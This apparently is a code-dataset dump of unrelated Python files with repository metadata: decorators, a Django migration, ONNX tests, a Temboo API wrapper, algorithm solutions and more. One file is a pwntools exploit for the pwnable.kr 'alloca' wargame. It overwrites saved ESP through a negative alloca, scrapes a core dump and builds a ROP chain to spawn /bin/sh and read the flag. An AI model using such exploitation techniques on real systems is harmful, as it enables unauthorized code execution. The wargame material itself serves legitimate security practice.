super(UserEntitlementOperationReference, self).__init__(id=id, plugin_id=plugin_id, status=status, url=url)
self.completed = completed
self.have_results_succeeded = have_results_succeeded
self.results = results
|
[
"usama.blavins1@gmail.com"
] |
usama.blavins1@gmail.com
|
225b6d5941ba617b3affab3562256f853598178b
|
c15a28ae62eb94dbf3ed13e2065195e572a9988e
|
/Cook book/src/9/defining_a_decorator_with_user_adjustable_attributes/example2.py
|
36d1bb206aabac56e5e7fba7acecdad70229e638
|
[] |
no_license
|
xuyuchends1/python
|
10798c92840a1a59d50f5dc5738b2881e65f7865
|
545d950a3d2fee799902658e8133e3692939496b
|
refs/heads/master
| 2021-01-25T07:07:04.812140
| 2020-02-28T09:25:15
| 2020-02-28T09:25:15
| 93,647,064
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
# Alternate formulation using function attributes directly
from functools import wraps
import logging
def logged(level, name=None, message=None):
'''
Add logging to a function. level is the logging
level, name is the logger name, and message is the
log message. If name and message aren't specified,
they default to the function's module and name.
'''
def decorate(func):
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
wrapper.log.log(wrapper.level, wrapper.logmsg)
return func(*args, **kwargs)
# Attach adjustable attributes
wrapper.level = level
wrapper.logmsg = logmsg
wrapper.log = log
return wrapper
return decorate
# Example use
@logged(logging.DEBUG)
def add(x, y):
return x + y
@logged(logging.CRITICAL, 'example')
def spam():
print('Spam!')
if __name__ == '__main__':
import logging
logging.basicConfig(level=logging.DEBUG)
print(add(2, 3))
# Change the log message
add.logmsg = 'Add called'
print(add(2, 3))
# Change the log level
add.level = logging.WARNING
print(add(2, 3))
|
[
"xuyuchends@163.com"
] |
xuyuchends@163.com
|
dbd5cecff92cba1fcf35215102752961f33b4718
|
ce74ed4ad6834168b81d6ec5e53c80935f247fe1
|
/python-wrapper/normalizer.py
|
260c4e083f822c223ff64a447d4b415a33455417
|
[] |
no_license
|
chenghuige/melt
|
6b6984243c71a85ec343cfaa67a66e3d1b48c180
|
d2646ffe84eabab464b4bef6b31d218abdbf6ce5
|
refs/heads/master
| 2021-01-25T16:46:57.567890
| 2017-08-26T04:30:13
| 2017-08-26T04:30:13
| 101,304,210
| 6
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,386
|
py
|
import os
import sys
import glob
from pyplusplus import module_builder
root = '/home/users/chenghuige/rsc/'
name = 'normalizer'
#define_symbols = ['GCCXML','PYTHON_WRAPPER','NO_BAIDU_DEP']
define_symbols = ['GCCXML','PYTHON_WRAPPER']
files = [
'./gezi.include.python/common_util.h',
'./gezi.include.python/log_util.h',
'./include.python/Prediction/Normalization/Normalizer.h',
'./include.python/Prediction/Normalization/NormalizerFactory.h',
'./gezi.include.python/Numeric/Vector/Vector.h',
]
paths = [
#'./gezi.include.python/Numeric/Vector/',
#'./include.python/MLCore/',
#'./include.python/Prediction/Instances/',
]
#import gezi
#for path in paths:
# files += [f for f in gezi.get_filepaths(path) if f.endswith('.h')]
include_paths=[
'third-64/glog',
'third-64/gflags',
'third-64/gtest',
'third-64/boost.1.53',
'lib2-64/bsl',
'lib2-64/postag',
'lib2-64/dict',
'lib2-64/libcrf',
'lib2-64/others-ex',
'lib2-64/ullib',
'lib2-64/ccode',
'public/odict/output',
'public/uconv/output',
'public/configure/output',
'app/search/sep/anti-spam/gezi/third/rabit',
]
include_paths_python = [
'app/search/sep/anti-spam/melt/python-wrapper',
]
include_paths_obsolute = [
'app/search/sep/anti-spam/melt/python-wrapper/gezi.include.python',
'lib2-64/wordseg',
'public/comlog-plugin',
'app/search/sep/anti-spam/gezi/third',
]
mb = module_builder.module_builder_t(
gccxml_path = '~/.jumbo/bin/gccxml',
define_symbols = define_symbols,
files = files,
include_paths = [root + f + '/include' for f in include_paths]
+ [root + f + '/include.python' for f in include_paths_python]
+ [root + f for f in include_paths_obsolute]
)
mb.build_code_creator( module_name='lib%s'%name )
mb.code_creator.user_defined_directories.append( os.path.abspath('.') )
mb.write_module( os.path.join( os.path.abspath('./'), '%s_py.cc'%name) )
|
[
"chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97"
] |
chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97
|
071cd8751ab4d3c34048353a7eaa7e15171d75b1
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Facebook/Actions/Fitness/Walks/UpdateWalk.py
|
493e93d6dc4ff63b1d782b571214053924414cfc
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100
| 2014-10-14T18:58:00
| 2014-10-14T18:58:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,177
|
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# UpdateWalk
# Updates an existing walk action.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class UpdateWalk(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the UpdateWalk Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Facebook/Actions/Fitness/Walks/UpdateWalk')
def new_input_set(self):
return UpdateWalkInputSet()
def _make_result_set(self, result, path):
return UpdateWalkResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UpdateWalkChoreographyExecution(session, exec_id, path)
class UpdateWalkInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the UpdateWalk
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved from the final step of the OAuth process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_ActionID(self, value):
"""
Set the value of the ActionID input for this Choreo. ((required, string) The id of the action to update.)
"""
InputSet._set_input(self, 'ActionID', value)
def set_Course(self, value):
"""
Set the value of the Course input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the course.)
"""
InputSet._set_input(self, 'Course', value)
def set_EndTime(self, value):
"""
Set the value of the EndTime input for this Choreo. ((optional, date) The time that the user ended the action (e.g. 2013-06-24T18:53:35+0000).)
"""
InputSet._set_input(self, 'EndTime', value)
def set_ExpiresIn(self, value):
"""
Set the value of the ExpiresIn input for this Choreo. ((optional, integer) The amount of time (in milliseconds) from the publish_time that the action will expire.)
"""
InputSet._set_input(self, 'ExpiresIn', value)
def set_Message(self, value):
"""
Set the value of the Message input for this Choreo. ((optional, string) A message attached to this action. Setting this parameter requires enabling of message capabilities.)
"""
InputSet._set_input(self, 'Message', value)
def set_Place(self, value):
"""
Set the value of the Place input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the location associated with this action.)
"""
InputSet._set_input(self, 'Place', value)
def set_Tags(self, value):
"""
Set the value of the Tags input for this Choreo. ((optional, string) A comma separated list of other profile IDs that also performed this action.)
"""
InputSet._set_input(self, 'Tags', value)
class UpdateWalkResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the UpdateWalk Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook.)
"""
return self._output.get('Response', None)
class UpdateWalkChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UpdateWalkResultSet(response, path)
|
[
"dattasaurabh82@gmail.com"
] |
dattasaurabh82@gmail.com
|
0e5c2f08572df65160cf0040294875735675b65c
|
ce78a21f86faf0b9783b4cbc1df1fc562e80a2d8
|
/Public/problem/D1/2070.큰놈,작은놈,같은놈.py
|
94f01b7703da6229722d2d9bd4b809bf0e98293d
|
[] |
no_license
|
jongjunpark/TIL
|
18961c6518f78c8e3d80677f39caf32c727c5beb
|
28f4d83e28851aac2dee4e77321543f1c811cc83
|
refs/heads/master
| 2023-03-17T01:45:51.867005
| 2022-10-31T10:44:05
| 2022-10-31T10:44:05
| 245,943,735
| 1
| 0
| null | 2023-03-05T17:15:39
| 2020-03-09T04:28:06
|
Python
|
UTF-8
|
Python
| false
| false
| 260
|
py
|
T = int(input())
for t in range(1,T+1):
numbers = list(map(int,input().split()))
if numbers[0] > numbers[1]:
print("#{} >".format(t))
elif numbers[0] == numbers[1]:
print("#{} =".format(t))
else:
print("#{} <".format(t))
|
[
"poiufgin7373@naver.com"
] |
poiufgin7373@naver.com
|
bfd1700ad0198fea64886e0f2aa06687748976c6
|
4979df3343d7b99a9a826bd1cb946ae79fac260c
|
/tests/test_runner.py
|
1ecd57ab36aa321d2148d96008b681ff168fcb63
|
[
"BSD-3-Clause"
] |
permissive
|
e-calder/enaml
|
753ff329fb8a2192bddbe7166581ed530fb270be
|
8f02a3c1a80c0a6930508551c7de1d345095173d
|
refs/heads/master
| 2021-07-30T01:18:29.222672
| 2021-07-27T08:51:50
| 2021-07-27T08:51:50
| 206,089,494
| 0
| 0
|
NOASSERTION
| 2019-09-03T13:52:44
| 2019-09-03T13:52:44
| null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
import os
import sys
import pytest
from utils import enaml_run
from enaml.application import Application, deferred_call
from enaml.runner import main
@pytest.fixture
def sys_argv():
""" Fixture that saves sys.argv and restores it after the test completes
"""
argv = sys.argv
try:
yield
finally:
sys.argv = argv
def test_runner(enaml_run, sys_argv):
"""Test invoking the runner application.
"""
dir_path = os.path.abspath(os.path.split(os.path.dirname(__file__))[0])
sys.argv = ['enaml-run',
os.path.join(dir_path,
'examples', 'stdlib', 'mapped_view.enaml')]
main()
|
[
"marul@laposte.net"
] |
marul@laposte.net
|
2df3f8b7738ac707606738926f6e0f3cb24f0154
|
4fc1d1097ac124d0dcbb9c1e574efec5c38105d8
|
/staff/migrations/0001_initial.py
|
90b968534d808291b151eba7b45cc526e3b91f5a
|
[] |
no_license
|
lilianwaweru/management
|
077d3261e1f8bd5d6c84a0b40edd28249410279f
|
e71bd0b67266ca8715605574e52c81137a66eaeb
|
refs/heads/master
| 2020-12-23T14:09:49.630171
| 2020-03-02T12:34:06
| 2020-03-02T12:34:06
| 237,173,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
# Generated by Django 3.0.3 on 2020-03-02 11:14
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Work',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, upload_to='images/')),
('first_name', models.CharField(max_length=30)),
('other_names', models.CharField(max_length=30)),
('department', models.CharField(max_length=30)),
('employee_number', models.IntegerField()),
('identification_number', models.IntegerField()),
('nssf_number', models.IntegerField()),
('nhif_number', models.IntegerField()),
('date_of_birth', models.DateField()),
('employee_position', models.CharField(max_length=30)),
('secondary_shool', models.CharField(max_length=100)),
('higher_education', models.CharField(max_length=100)),
('level_of_education', models.CharField(max_length=100)),
('course', models.CharField(max_length=100)),
('other_certificates', models.CharField(max_length=100)),
('company', models.CharField(max_length=100)),
('position', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('tasks', models.CharField(max_length=1000)),
],
),
]
|
[
"lilowesh.lw@gmail.com"
] |
lilowesh.lw@gmail.com
|
e328cc4ddbb881174b91f93521be7d3e5d87ce0a
|
15b7a9708d6fb6f9ae5ac55830f996c629468910
|
/ch06/Ex6_16.py
|
686602d686c015c0a9a4d929a1940e73303da2f7
|
[] |
no_license
|
Anancha/Python_Bible
|
81dfab4ebe7f74c46615403cbd8a37b714b84df1
|
d9569abf2ad60393289fcec22b81340a19e28601
|
refs/heads/main
| 2023-09-03T00:52:58.249183
| 2021-11-12T07:57:56
| 2021-11-12T07:57:56
| 415,224,243
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 665
|
py
|
shape_tuple1 = ("square","circle","triangle","rectangle","star")
shape_tuple2 = ("heart","oval")
print("shape_tuple1 = ",shape_tuple1)
print("shape_tuple2 = ",shape_tuple2)
length = len(shape_tuple1)
print("shape_tuple1 = ",length)
print("shape_tuple1[0] = ",shape_tuple1[0])
print("shape_tuple1[4] = ",shape_tuple1[4])
print("shape_tuple1[-5] = ",shape_tuple1[-5])
print("shape_tuple1[-1] = ",shape_tuple1[-1])
print("shape_tuple1[0:5] = ",shape_tuple1[0:5])
print("shape_tuple1[:5] = ",shape_tuple1[:5])
print("shape_tuple1[-4:] = ",shape_tuple1[-4:])
shape_tuple = shape_tuple1 + shape_tuple2
print("combine tuple1 and tuple2 = ",shape_tuple)
|
[
"noreply@github.com"
] |
Anancha.noreply@github.com
|
699eda9c9fa27436875646f3e48e3a68b554030c
|
94923becbb06260e3cd35dde46c3d1688c9f7feb
|
/wargames/pwnablekr/rookiss/alloca/win.py
|
b41641d53ba295cd19ff532a9f6708165421a956
|
[
"MIT"
] |
permissive
|
infernalheaven/examples
|
b1826d521b04ea5bf55c7c2b5a6cc620df59cfe9
|
a3a3bfe2a7b9addea94396f21b73252c3bd56d49
|
refs/heads/master
| 2021-01-11T10:58:10.794931
| 2016-10-05T22:56:39
| 2016-10-05T22:56:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,582
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = 'pwnable.kr'
user = 'alloca'
password = 'guest'
binary = '/home/%s/%s' % (user,user)
chal = os.path.basename(binary)
shell = ssh(host=host, user=user, password=password, port=2222)
if not os.path.exists(chal):
shell.download_file(binary)
shell.download_file(binary + '.c')
os.chmod(chal, 0755)
#
# Disable ASLR so that DSO addresses are constant.
#
context.aslr = False
#
# Using a negative value for alloca allows us to overwrite the saved value
# of ESP on the stack.
#
# The offset which gives us this control is -92, though -88 throuh -96 also
# work.
#
# Because of the way things work out, the stack value will be XORed with
# some random stack trash. On the up-side, it is consistent from run-to-run.
# On the downside, it is not consistent between different versions of libc.
#
# In order to have a portable exploit (works locally and remotely), we will
# force the target binary to crash once, and scrape the value of ESP at the
# segfault by loading a corefile.
#
# In order for a corefile to drop, we have to be in a writable directory
shell.set_working_directory()
shell('ln -s %s .' % binary)
#
# Launch the process, and let it die a terrible death
#
# Note that we need the setuid bit to be ignored in order for a corefile we
# can use to be dropped.
#
p = shell.process('./alloca',
setuid=0)
address = 0xdeadbeef
cookie = str(signed(address))
pattern = cyclic(64)
data = fit({0: '-92',
16: cookie,
32: pattern},
filler='\n')
#
# All of the data should be sent at the same time, so that it is all
# buffered at once. The fgets() is actually a noop since the value is negative.
#
# We are relying on the buffering behavior of scanf().
#
p.sendline(data)
p.recvall()
# Grab the corefile after it's written. It may take a second or two to appear.
pause(2)
shell.download('core')
core = Core('core')
# We want to be sure that we crashed at the 'ret'
# Either we'll crash at that instruction (stack pointer is invalid)
# or at zero (stack pointer was valid, pointed at an empty page).
assert core.eip in (0x804878a, 0)
# Find out the XOR value. This is almost-always constant, but varies by 1 bit
# on the pwnable.kr server as of writing. Luckily, the 1 bit that changes is
# the '4' bit, so as long as we pad an extra 'ret' in our ROP, we're fine.
xor = address ^ core.esp
log.info("%08x xor magic" % xor)
# Find our data in the heap
address = core.search(pattern).next()
log.info("%08x heap address" % address)
#
# We need a bit of a RET sled because the XOR value isn't perfectly constant,
# but only varies by a small amount which we can account for.
#
libc = p.libc
rop = ROP(libc)
log.info("libc is at %#x" % libc.address)
binsh = libc.search('/bin/sh\x00').next()
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.execve(binsh,0,0)
log.info(rop.dump())
# Shoot for the middle of the RET sled
address += 8
# One very last time, to pwn it proper!
cookie = str(signed(address ^ xor))
data = fit({0: '-92',
16: cookie,
32: str(rop)},
filler='\n')
p = shell.process('./alloca')
# shell.upload('~/bin/gdbserver')
# shell('chmod +x gdbserver')
# p = gdb.debug('./alloca', '''
# break *0x804878a
# set follow-fork-mode child
# catch exec
# continue
# ''', ssh=shell)
p.sendline(data)
p.recvuntil('$')
p.clean()
p.sendline('cat /home/alloca/flag')
flag = p.recvline().strip()
log.success('Flag: %r' % flag)
p.interactive(prompt='')
|
[
"riggle@google.com"
] |
riggle@google.com
|
95c8d89866be1ab21e245c5c39170e3918f41ece
|
78c4ccb183a99ebaabcdc3a3a69f029e4aee0f5c
|
/AlgorithmStudy/백준/무지성 랜덤풀이/9월/9.27/13549 숨바꼭질3.py
|
e0e130cd47181bea752f97e6b07942782346f798
|
[] |
no_license
|
cladren123/study
|
ef2c45bc489fa658dbc9360fb0b0de53250500e5
|
241326e618f1f3bb1568d588bf6f53b78920587a
|
refs/heads/master
| 2023-09-02T02:21:24.560967
| 2021-11-05T12:20:06
| 2021-11-05T12:20:06
| 368,753,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,339
|
py
|
"""
문제유형 :
그래프 이론
그래프 탐색
너비 우선 탐색
다익스트라
0-1 너비 우선 탐색
시간초과 발생
범위를 지정해서 범위가 초과하는 것들을 걷어내니 해결할 수 있었다.
"""
import sys
from collections import deque
input = sys.stdin.readline
# n : 수빈 k : 동생
n, m = map(int, input().split())
# 최대 크기 변수
maxnum = 100001
# x 지점에 도착했을 때 시간을 담을 리스트
timelist = [-1] * maxnum
# x 지점을 방문했는지 표시하는 리스트
visited = [0] * maxnum
# 초기화 하는 과정도 중요하다. -> 하지 않으면 에러 발생
que = deque()
que.append(n)
timelist[n] = 0
visited[n] = 1
while que :
loc = que.popleft()
# *2 인 경우, 시간을 소요하지 않으므로 먼저 탐색하게 만든다.
if loc*2 < maxnum and visited[loc*2] == 0 :
timelist[loc*2] = timelist[loc]
visited[loc*2] = 1
que.appendleft(loc*2)
# +1 인 경우
if loc+1 < maxnum and visited[loc+1] == 0 :
visited[loc+1] = 1
timelist[loc+1] = timelist[loc] + 1
que.append(loc+1)
# -1 인 경우
if loc-1 >= 0 and visited[loc-1] == 0 :
visited[loc-1] = 1
timelist[loc-1] = timelist[loc] + 1
que.append(loc-1)
print(timelist[m])
|
[
"48821942+cladren123@users.noreply.github.com"
] |
48821942+cladren123@users.noreply.github.com
|
c87601687dd5c7c65e20dba92b239e070261b317
|
3670f46666214ef5e1ce6765e47b24758f3614a9
|
/oneflow/python/test/onnx/util.py
|
d2222f7d6b30cad257fa79d950b134ab33ead31c
|
[
"Apache-2.0"
] |
permissive
|
ashing-zhang/oneflow
|
0b8bb478ccd6cabea2dca0864defddab231919bf
|
70db228a4d361c916f8f8d85e908795b479e5d20
|
refs/heads/master
| 2022-12-14T21:13:46.752535
| 2020-09-07T03:08:52
| 2020-09-07T03:08:52
| 293,535,931
| 1
| 0
|
Apache-2.0
| 2020-09-07T13:28:25
| 2020-09-07T13:28:24
| null |
UTF-8
|
Python
| false
| false
| 2,994
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import oneflow as flow
import onnxruntime as ort
import onnx
from collections import OrderedDict
import tempfile
import os
import shutil
def convert_to_onnx_and_check(
job_func,
print_outlier=False,
explicit_init=True,
external_data=False,
ort_optimize=True,
opset=None,
):
check_point = flow.train.CheckPoint()
if explicit_init:
# it is a trick to keep check_point.save() from hanging when there is no variable
@flow.global_function(flow.FunctionConfig())
def add_var():
return flow.get_variable(
name="trick",
shape=(1,),
dtype=flow.float,
initializer=flow.random_uniform_initializer(),
)
check_point.init()
flow_weight_dir = tempfile.TemporaryDirectory()
check_point.save(flow_weight_dir.name)
# TODO(daquexian): a more elegant way?
while not os.path.exists(os.path.join(flow_weight_dir.name, "snapshot_done")):
pass
onnx_model_dir = tempfile.TemporaryDirectory()
onnx_model_path = os.path.join(onnx_model_dir.name, "model.onnx")
flow.onnx.export(
job_func,
flow_weight_dir.name,
onnx_model_path,
opset=opset,
external_data=external_data,
)
flow_weight_dir.cleanup()
ort_sess_opt = ort.SessionOptions()
ort_sess_opt.graph_optimization_level = (
ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
if ort_optimize
else ort.GraphOptimizationLevel.ORT_DISABLE_ALL
)
sess = ort.InferenceSession(onnx_model_path, sess_options=ort_sess_opt)
onnx_model_dir.cleanup()
assert len(sess.get_outputs()) == 1
assert len(sess.get_inputs()) <= 1
ipt_dict = OrderedDict()
for ipt in sess.get_inputs():
ipt_data = np.random.uniform(low=-10, high=10, size=ipt.shape).astype(
np.float32
)
ipt_dict[ipt.name] = ipt_data
onnx_res = sess.run([], ipt_dict)[0]
oneflow_res = job_func(*ipt_dict.values()).get().numpy()
rtol, atol = 1e-2, 1e-5
if print_outlier:
a = onnx_res.flatten()
b = oneflow_res.flatten()
for i in range(len(a)):
if np.abs(a[i] - b[i]) > atol + rtol * np.abs(b[i]):
print("a[{}]={}, b[{}]={}".format(i, a[i], i, b[i]))
assert np.allclose(onnx_res, oneflow_res, rtol=rtol, atol=atol)
|
[
"noreply@github.com"
] |
ashing-zhang.noreply@github.com
|
cec1ac5c978a20fda316ddf1475bffc7cc5c0a85
|
b91578b96ffe63639d3efc70d4737b92091cd0b1
|
/backend/unpp_api/apps/sanctionslist/serializers.py
|
3d57ed5f866b73fbe8dde2953857e5e283fedb35
|
[
"Apache-2.0"
] |
permissive
|
unicef/un-partner-portal
|
876b6ec394909ed2f72777493623413e9cecbfdc
|
73afa193a5f6d626928cae0025c72a17f0ef8f61
|
refs/heads/develop
| 2023-02-06T21:08:22.037975
| 2019-05-20T07:35:29
| 2019-05-20T07:35:29
| 96,332,233
| 6
| 1
|
Apache-2.0
| 2023-01-25T23:21:41
| 2017-07-05T15:07:44
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 633
|
py
|
from rest_framework import serializers
from sanctionslist.models import SanctionedNameMatch
class SanctionedNameMatchSerializer(serializers.ModelSerializer):
sanctioned_type = serializers.CharField(source='name.item.sanctioned_type', read_only=True)
sanctioned_type_display = serializers.CharField(source='name.item.get_sanctioned_type_display', read_only=True)
match_type_display = serializers.CharField(source='get_match_type_display', read_only=True)
class Meta:
model = SanctionedNameMatch
exclude = (
'partner',
'can_ignore',
'can_ignore_text',
)
|
[
"maciej.jaworski@tivix.com"
] |
maciej.jaworski@tivix.com
|
b0ad500120f8469b888e170431f17043052f3e7c
|
d57148c74b79954ff762ce3a02c1b0ef3e79d6a1
|
/libs/smartmeshsdk-REL-1.3.0.1/libs/VManagerSDK/vmanager/models/net_reset_info.py
|
f58017d71ca05bfc882e34f73a9d91a3d9409ea4
|
[
"BSD-3-Clause"
] |
permissive
|
realms-team/solmanager
|
62fb748b140361cf620b7dd8ff6df755afd42bbe
|
95fa049df041add5f8d37c053ef560d0e5d06dff
|
refs/heads/master
| 2020-04-11T10:00:21.086457
| 2018-11-20T15:49:27
| 2018-11-20T15:49:27
| 40,271,406
| 0
| 0
|
BSD-3-Clause
| 2018-11-20T15:49:28
| 2015-08-05T22:15:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,061
|
py
|
# coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetResetInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
NetResetInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'reload': 'bool'
}
self.attribute_map = {
'reload': 'reload'
}
self._reload = None
@property
def reload(self):
"""
Gets the reload of this NetResetInfo.
reload configuration after reset
:return: The reload of this NetResetInfo.
:rtype: bool
"""
return self._reload
@reload.setter
def reload(self, reload):
"""
Sets the reload of this NetResetInfo.
reload configuration after reset
:param reload: The reload of this NetResetInfo.
:type: bool
"""
self._reload = reload
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"twatteyne@gmail.com"
] |
twatteyne@gmail.com
|
9c50ac850f1e9d03b9356f0e58aa62b4a72ac2d5
|
be61a9f30274514857ea34297719157f1e5b8447
|
/fhir/resources/DSTU2/tests/test_provenance.py
|
7ef6baef182c10f5c8210085602e62a429fe450a
|
[
"BSD-3-Clause"
] |
permissive
|
jwygoda/fhir.resources
|
ceff3a620100d2e875136b86d3e82816c0e60a33
|
5053565570d1ca992d9971d20db813c53fd350b9
|
refs/heads/master
| 2021-02-05T02:59:17.436485
| 2019-07-18T10:57:33
| 2019-07-18T10:57:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,361
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2019-05-14.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import provenance
from .fhirdate import FHIRDate
class ProvenanceTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Provenance", js["resourceType"])
return provenance.Provenance(js)
def testProvenance1(self):
inst = self.instantiate_from("provenance-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
self.implProvenance1(inst)
js = inst.as_json()
self.assertEqual("Provenance", js["resourceType"])
inst2 = provenance.Provenance(js)
self.implProvenance1(inst2)
def implProvenance1(self, inst):
self.assertEqual(inst.agent[0].relatedAgent[0].target, "#a1")
self.assertEqual(inst.agent[0].relatedAgent[0].type.text, "used")
self.assertEqual(inst.agent[0].role.code, "author")
self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
self.assertEqual(inst.agent[0].userId.value, "hhd")
self.assertEqual(inst.agent[1].id, "a1")
self.assertEqual(inst.agent[1].role.code, "DEV")
self.assertEqual(inst.agent[1].role.system, "http://hl7.org/fhir/v3/ParticipationType")
self.assertEqual(inst.entity[0].display, "CDA Document in XDS repository")
self.assertEqual(inst.entity[0].reference, "DocumentReference/90f55916-9d15-4b8f-87a9-2d7ade8670c8")
self.assertEqual(inst.entity[0].role, "source")
self.assertEqual(inst.entity[0].type.code, "57133-1")
self.assertEqual(inst.entity[0].type.display, "Referral note")
self.assertEqual(inst.entity[0].type.system, "http://loinc.org")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.period.start.date, FHIRDate("2015-06-27").date)
self.assertEqual(inst.period.start.as_json(), "2015-06-27")
self.assertEqual(inst.policy[0], "http://acme.com/fhir/Consent/25")
self.assertEqual(inst.reason[0].coding[0].code, "3457005")
self.assertEqual(inst.reason[0].coding[0].display, "Referral")
self.assertEqual(inst.reason[0].coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.reason[0].text, "Accepting a referral")
self.assertEqual(inst.recorded.date, FHIRDate("2015-06-27T08:39:24+10:00").date)
self.assertEqual(inst.recorded.as_json(), "2015-06-27T08:39:24+10:00")
self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
self.assertEqual(inst.text.status, "generated")
def testProvenance2(self):
inst = self.instantiate_from("provenance-example-sig.json")
self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
self.implProvenance2(inst)
js = inst.as_json()
self.assertEqual("Provenance", js["resourceType"])
inst2 = provenance.Provenance(js)
self.implProvenance2(inst2)
def implProvenance2(self, inst):
self.assertEqual(inst.activity.coding[0].code, "AU")
self.assertEqual(inst.activity.coding[0].display, "authenticated")
self.assertEqual(inst.activity.coding[0].system, "http://hl7.org/fhir/v3/DocumentCompletion")
self.assertEqual(inst.agent[0].role.code, "verifier")
self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
self.assertEqual(inst.agent[0].userId.value, "hhd")
self.assertEqual(inst.id, "signature")
self.assertEqual(inst.reason[0].coding[0].code, "TREAT")
self.assertEqual(inst.reason[0].coding[0].display, "treatment")
self.assertEqual(inst.reason[0].coding[0].system, "http://hl7.org/fhir/v3/ActReason")
